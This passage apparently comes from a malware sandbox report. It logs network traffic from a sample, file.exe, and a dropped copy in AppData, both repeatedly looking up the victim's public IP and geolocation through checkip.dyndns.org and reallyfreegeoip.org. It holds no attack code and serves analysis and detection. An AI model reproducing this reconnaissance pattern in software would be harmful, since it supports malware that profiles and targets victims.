Dec 13, 2024 17:58:25.280823946 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:25.281267881 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:25.648726940 CET	80	49798	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:25.650258064 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:25.650314093 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:25.650394917 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:25.650732040 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:25.650748014 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:25.701118946 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:26.867553949 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:26.869360924 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:26.869385958 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:27.316282988 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:27.316354990 CET	443	49804	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:27.316401958 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:27.316852093 CET	49804	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:59:12.415951967 CET	80	49732	132.226.8.169	192.168.2.11
Dec 13, 2024 17:59:12.416084051 CET	49732	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:59:14.165628910 CET	80	49740	132.226.8.169	192.168.2.11
Dec 13, 2024 17:59:14.165715933 CET	49740	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:59:28.603302002 CET	80	49795	132.226.8.169	192.168.2.11
Dec 13, 2024 17:59:28.608284950 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:59:30.650078058 CET	80	49798	132.226.8.169	192.168.2.11
Dec 13, 2024 17:59:30.657891035 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 18:00:03.623646975 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 18:00:03.743554115 CET	80	49795	132.226.8.169	192.168.2.11
Dec 13, 2024 18:00:05.654702902 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 18:00:05.774669886 CET	80	49798	132.226.8.169	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:57:57.441102982 CET	49287	53	192.168.2.11	1.1.1.1
Dec 13, 2024 17:57:57.579071999 CET	53	49287	1.1.1.1	192.168.2.11
Dec 13, 2024 17:58:01.161681890 CET	57302	53	192.168.2.11	1.1.1.1
Dec 13, 2024 17:58:01.305634022 CET	53	57302	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 17:57:57.441102982 CET	192.168.2.11	1.1.1.1	0x2188	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:01.161681890 CET	192.168.2.11	1.1.1.1	0x9e33	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:57:57.579071999 CET	1.1.1.1	192.168.2.11	0x2188	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:01.305634022 CET	1.1.1.1	192.168.2.11	0x9e33	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:01.305634022 CET	1.1.1.1	192.168.2.11	0x9e33	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49711	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:57:57.710114002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:00.626785994 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:58:00.631180048 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:01.121453047 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:58:03.016973019 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:03.506664038 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49718	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:00.948458910 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:03.129709959 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:58:03.134583950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:03.673341990 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:58:05.419488907 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:05.918910027 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49732	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:05.329756975 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:07.408196926 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49740	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:07.725774050 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:58:09.169523001 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49746	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:09.219557047 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:10.699600935 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49750	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:10.984638929 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:12.401978970 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49757	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:12.497014046 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:13.916088104 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49766	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:14.239017963 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:15.653450012 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49772	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:15.709763050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:17.135123968 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49779	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:17.713839054 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:19.145230055 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49781	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:18.925951958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:20.350414991 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49789	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:20.930030107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:22.355760098 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49795	132.226.8.169	80	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:22.155662060 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:23.610057116 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49798	132.226.8.169	80	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:58:24.154633999 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:58:25.648726940 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49719	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:02 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:02 UTC	879	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97851 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w8fsiJG%2FAzn1ccbCqSMQTg%2BDxTRsLIBnZErkPk%2BwHLpDIDv91vZyQ1nOK5wcP%2BVHCpapsZzJ3NR9uB1eejWtvnAaqW5f83sBBCP4xfgfaS245AFMyOdKJzesPX27zC2fpkFkI%2BYb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f2799c543c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1602&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1813664&cwnd=222&unsent_bytes=0&cid=2435753bfbf7a0eb&ts=478&x=0"
2024-12-13 16:58:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

